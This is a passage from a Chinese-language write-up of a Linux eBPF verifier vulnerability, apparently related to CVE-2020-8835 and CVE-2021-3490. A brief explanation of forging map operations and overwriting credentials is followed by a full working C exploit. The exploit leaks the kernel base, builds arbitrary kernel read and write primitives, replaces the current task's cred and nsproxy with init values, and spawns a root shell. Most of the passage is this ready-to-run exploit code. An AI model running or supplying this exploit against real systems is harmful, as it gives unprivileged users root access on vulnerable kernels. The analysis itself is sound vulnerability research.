或 BPF_MAP_TYPE_STACK
,则这个函数会被调用:
static int bpf_map_update_value(struct bpf_map *map, struct fd f, void *key,
void *value, __u64 flags)
{
//...
} else if (map->map_type == BPF_MAP_TYPE_QUEUE ||
map->map_type == BPF_MAP_TYPE_STACK) {
err = map->ops->map_push_elem(map, value, flags);
那么这个 fake_ops
伪造在哪里呢?开启 smap
的情况下,我们只能伪造在内核空间。还记得之前泄漏的 map_addr
吗?我们知道 value_addr = map_addr + 0x110
,而 value
中的值用户是可控的,其地址又是知道的,所以 fake_ops
自然就伪造在 value
中了,而 map_type
也是可以直接通过越界写进行修改。注意这里也是只能写 4 字节,并且还要绕过如下限制:
static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
struct bpf_array *array = container_of(map, struct bpf_array, map);
u32 index = key ? *(u32 *)key : U32_MAX;
u32 *next = (u32 *)next_key;
if (index >= array->map.max_entries) {
*next = 0;
return 0;
}
if (index == array->map.max_entries - 1)
return -ENOENT;
*next = index + 1;
return 0;
}
这里利用越界写直接修改 max_entries = 0xffffffff
。
最后提权时,我直接修改的 current_task
的 cred/real_cred
为 init_cred
,但是这里需要注意的是 init_cred
的高 8 字节恒为 0xffffffff
,这是无法写入的,因为其满足 index == array->map.max_entries - 1
。但是我们可以通过错为写绕过,因为普通用户的 cred/real_cred
是在堆上分配的,其高 4 字节恒为 0xffff
,所以我们其实只需要覆盖低 6 字节即可
exp 即效果演示
exp
如下:
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <ctype.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/bpf.h>
#include "bpf_insn.h"
void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(2);
exit(EXIT_FAILURE);
}
void info(char *msg)
{
printf("\033[35m\033[1m[+] %s\n\033[0m", msg);
}
void hexx(char *msg, size_t value)
{
printf("\033[32m\033[1m[+] %s: \033[0m%#lx\n", msg, value);
}
void binary_dump(char *desc, void *addr, int len) {
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("\033[33m[*] %s:\n\033[0m", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}
/* root checker and shell poper */
void get_root_shell(void)
{
if(getuid()) {
puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
sleep(2);
exit(EXIT_FAILURE);
}
puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");
system("/bin/sh");
/* to exit the process normally, instead of segmentation fault */
exit(EXIT_SUCCESS);
}
/* bind the process to specific core */
void bind_core(int core)
{
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}
static inline int bpf(int cmd, union bpf_attr *attr)
{
return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}
static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
unsigned int value_size, unsigned int max_entries)
{
union bpf_attr attr = {
.map_type = map_type,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries,
};
return bpf(BPF_MAP_CREATE, &attr);
}
static __always_inline int
bpf_map_lookup_elem(int map_fd, const void* key, void* value)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
.value = (uint64_t)value,
};
return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}
static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
.value = (uint64_t)value,
.flags = flags,
};
return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}
static __always_inline int
bpf_map_delete_elem(int map_fd, const void* key)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
};
return bpf(BPF_MAP_DELETE_ELEM, &attr);
}
static __always_inline int
bpf_map_get_next_key(int map_fd, const void* key, void* next_key)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
.next_key = (uint64_t)next_key,
};
return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}
static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd)
{
struct bpf_map_info info;
union bpf_attr attr = {
.info.bpf_fd = map_fd,
.info.info_len = sizeof(info),
.info.info = (uint64_t)&info,
};
bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
return info.btf_id;
}
int sockets[2];
int map_fd;
int expmap_fd;
int prog_fd;
uint32_t key;
uint64_t* value1;
uint64_t* value2;
uint64_t array_map_ops = 0xffffffff8226d900;
uint64_t init_cred = 0xffffffff82893a00; // D init_cred
uint64_t init_task = 0xffffffff82816080; // D init_task
uint64_t init_nsproxy = 0xffffffff82893720; // D init_nsproxy
uint64_t map_addr = -1;
uint64_t koffset = -1;
uint64_t kbase = -1;
uint64_t tag = 0x6159617a6f616958;
uint64_t current_task;
struct bpf_insn prog[] = {
BPF_LD_MAP_FD(BPF_REG_1, 3), // r1 = [map_fd] = bpf_map ptr1
BPF_MOV64_IMM(BPF_REG_6, 0), // r6 = 0
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8), // *(uint64_t*)(fp - 8) = r6 = 0
BPF_MOV64_REG(BPF_REG_7, BPF_REG_10), // r7 = r10 = fp
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8), // r7 = r7 - 8 = fp - 8
BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), // r2 = r7 = fp - 8
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr1, r2 = fp - 8
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 <= r0 goto pc+1 right
BPF_EXIT_INSN(), // exit
BPF_MOV64_REG(BPF_REG_9, BPF_REG_0), // r9 = r0 = value_buf1 ptr
BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_9, 0), // r6 = *(uint64_t*)r9 = value_buf1[0] = 2
BPF_MOV64_IMM(BPF_REG_0, 0), // r0 = 0
BPF_JMP_IMM(BPF_JGE, BPF_REG_6, 1, 1), // if r6 >= 1 goto pc+1 ==> inc reg6.umin_value
BPF_EXIT_INSN(), // exit
BPF_MOV64_IMM(BPF_REG_8, 1), // r8 = 1
BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32), // r8 = r8 << 32 = 1 << 32 = 0x1 0000 0000
BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 1), // r8 = r8 + 1 = 0x1 0000 0001
BPF_JMP_REG(BPF_JLE, BPF_REG_6, BPF_REG_8, 1), // if r6 <= r8 goto pc+1 ==> set reg6.umax_value = 0x1 0000 0001
BPF_EXIT_INSN(), // exit
// BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_JMP32_IMM(BPF_JNE, BPF_REG_6, 5, 1), // if r6 != 1 goto pc+1 ==> trigger bug
// BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN(), // exit
BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 2), // r6 = r6 & 2 = 2 & 2 = 2
BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 1), // r6 = r6 >> 1 = 2 >> 1 = 1
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110), // r6 = r6 * 0x110 = 1 * 0x110 = 0x110
BPF_LD_MAP_FD(BPF_REG_1, 4), // r1 = [expmap_fd] = bpf_map ptr2
BPF_MOV64_IMM(BPF_REG_8, 0), // r8 = 0
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, -8), // *(uint64_t*)(fp - 8) = r8 = 0
BPF_MOV64_REG(BPF_REG_7, BPF_REG_10), // r7 = r10 = fp
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8), // r7 = r7 - 8 = fp - 8
BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), // r2 = r7 = fp - 8
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr2, r2 = fp - 8
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 <= r0 goto pc+1 right
BPF_EXIT_INSN(), // exit
BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), // r7 = r0 = value_buf2 addr
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6), // r7 = r7 - r6 = value_buf2 addr - 0x110
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), // r8 = *(uint64_t*)r7 = value_buf2[-0x110/8] = array_map_ops
BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x18), // *(uint64_t*)(r9 +0x18) = value_buf1[3] = r8 = array_map_ops
BPF_MOV64_REG(BPF_REG_2, BPF_REG_8), // r2 = r8 = array_map_ops
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0xc0), // r8 = *(uint64_t*)(r7 +0xc0) = value_buf2[-(0x110-0xc0)/8] = map_addr
BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x20), // *(uint64_t*)(r9 +0x20) = value_buf1[4] = r8 = map_addr
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 8), // r8 = *(uint64_t*)(r9 +8) = value_buf1[1] = arb_read addr
BPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 1), // if arb_read addr == NULL goto pc+1
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0x40), // *(uint64_t*)(r7 +0x40) = value_buf2[-(0x110-0x40)/8] = btf = r8
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 0x10), // r8 = value_buf1[2] = fake_ops
BPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 4), // if arb_write flag == 0 goto pc+4
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), // expmap's bpf_map_ops = r8 = fake_ops
BPF_ST_MEM(BPF_W, BPF_REG_7, 0x18, BPF_MAP_TYPE_STACK), // map_type = BPF_MAP_TYPE_STACK
BPF_ST_MEM(BPF_W, BPF_REG_7, 0x24, -1), // max_entries = -1
BPF_ST_MEM(BPF_W, BPF_REG_7, 0x2c, 0), // spin_lock_off = 0
BPF_ALU64_IMM(BPF_MOV, BPF_REG_0, 0),
BPF_EXIT_INSN(),
};
#define BPF_LOG_SZ 0x10000
char bpf_log_buf[BPF_LOG_SZ] = { '\0' };
union bpf_attr attr = {
.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
.insns = (uint64_t) &prog,
.insn_cnt = sizeof(prog) / sizeof(prog[0]),
.license = (uint64_t) "GPL",
.log_level = 1,
.log_buf = (uint64_t) bpf_log_buf,
.log_size = BPF_LOG_SZ,
};
void init() {
setbuf(stdin, NULL);
setbuf(stdout, NULL);
setbuf(stderr, NULL);
}
void trigger() {
char buffer[64];
write(sockets[0], buffer, sizeof(buffer));
}
void prep() {
value1 = (uint64_t*)calloc(0x1000, 1);
value2 = (uint64_t*)calloc(0x1000, 1);
prctl(PR_SET_NAME, "XiaozaYa");
map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x100, 1);
if (map_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");
expmap_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x200, 1);
if (expmap_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");
prog_fd = bpf(BPF_PROG_LOAD, &attr);
if (prog_fd < 0) puts(bpf_log_buf), perror("BPF_PROG_LOAD"), err_exit("BPF_PROG_LOAD");
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)
perror("socketpair()"), err_exit("socketpair()");
if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0)
perror("socketpair SO_ATTACH_BPF"), err_exit("socketpair()");
}
uint32_t arb_read_4_byte(uint64_t addr) {
value1[0] = 2;
value1[1] = addr - 0x58;
value1[2] = 0;
bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
trigger();
return bpf_map_get_info_by_fd(expmap_fd);
}
uint64_t arb_read(uint64_t addr) {
uint64_t lo = arb_read_4_byte(addr);
uint64_t hi = arb_read_4_byte(addr+4);
return (hi << 32) | lo;
}
void prep_arb_write() {
uint64_t buf[0x200/8] = { 0 };
value1[0] = 2;
value1[1] = 0;
value1[2] = map_addr+0x110+0x20;
uint64_t fake_ops[] = {
0x0,0x0,0x0,0x0,
0xffffffff812677b0,
0xffffffff81268830,
0x0,
0xffffffff81267df0,
0xffffffff812678a0,
0x0,0x0,
0xffffffff8124a150,
0x0,
0xffffffff81249f20,
0x0,
0xffffffff81267930,
0xffffffff81267c70,
0xffffffff81267780,
0xffffffff812678a0,
0x0,0x0,0x0,0x0,
0xffffffff81268340,
0x0,
0xffffffff81267a10,
0xffffffff81268640,
0x0,0x0,0x0,
0xffffffff81267830,
0xffffffff81267860,
0xffffffff812679d0
};
for (int i = 0; i < sizeof(fake_ops) / 8; i++) {
if (fake_ops[i]) fake_ops[i] += koffset;
}
memcpy(value2, fake_ops, sizeof(fake_ops));
bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
trigger();
}
void arb_write_4_byte(uint64_t addr, uint32_t val) {
value2[0] = val - 1;
bpf_map_update_elem(expmap_fd, &key, value2, addr);
}
void arb_write(uint64_t addr, uint64_t val) {
arb_write_4_byte(addr, val&0xffffffff);
arb_write_4_byte(addr+4, (val>>32)&0xffffffff);
}
void leak() {
uint64_t buf[0x200/8] = { 0 };
value1[0] = 2;
value1[1] = 0;
value1[2] = 0;
bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
trigger();
memset(buf, 0, sizeof(buf));
bpf_map_lookup_elem(map_fd, &key, buf);
// binary_dump("LEAK DATA", buf, 0x100);
if ((buf[3] & 0xffffffff00000fff) == 0xffffffff00000900) {
koffset = buf[3] - array_map_ops;
kbase = 0xffffffff81000000 + koffset;
map_addr = buf[4] - 0xc0;
hexx("koffset", koffset);
hexx("kbase", kbase);
hexx("map_addr", map_addr);
}
if (koffset == -1) err_exit("FAILED to leak kernel base");
array_map_ops += koffset;
init_cred += koffset;
init_task += koffset;
init_nsproxy += koffset;
hexx("init_cred", init_cred);
hexx("init_task", init_task);
hexx("init_nsproxy", init_nsproxy);
current_task = init_task;
for (;;) {
if (arb_read(current_task+0xa58) == tag) {
break;
}
current_task = arb_read(current_task + 0x7a8) - 0x7a0;
}
hexx("current_task", current_task);
}
int main(int argc, char** argv, char** envp)
{
init();
prep();
leak();
prep_arb_write();
// cred: 0xa48 real_cred: 0xa40 nsproxy: 0xaa8
arb_write_4_byte(current_task+0xa48, init_cred&0xffffffff);
arb_write_4_byte(current_task+0xa48+2, (init_cred>>16)&0xffffffff);
arb_write_4_byte(current_task+0xa40, init_cred&0xffffffff);
arb_write_4_byte(current_task+0xa40+2, (init_cred>>16)&0xffffffff);
arb_write_4_byte(current_task+0xaa8, init_nsproxy&0xffffffff);
arb_write_4_byte(current_task+0xaa8+2, (init_nsproxy>>16)&0xffffffff);
get_root_shell();
// puts(bpf_log_buf);
puts("EXP NERVER END!");
return 0;
}
效果如下:
参考
【kernel exploit】CVE-2020-8835:eBPF verifier 错误处理导致越界读写
CVE-2020-8835_eBPF提权漏洞分析
【CVE.0x0A】CVE-2021-3490 漏洞复现及简要分析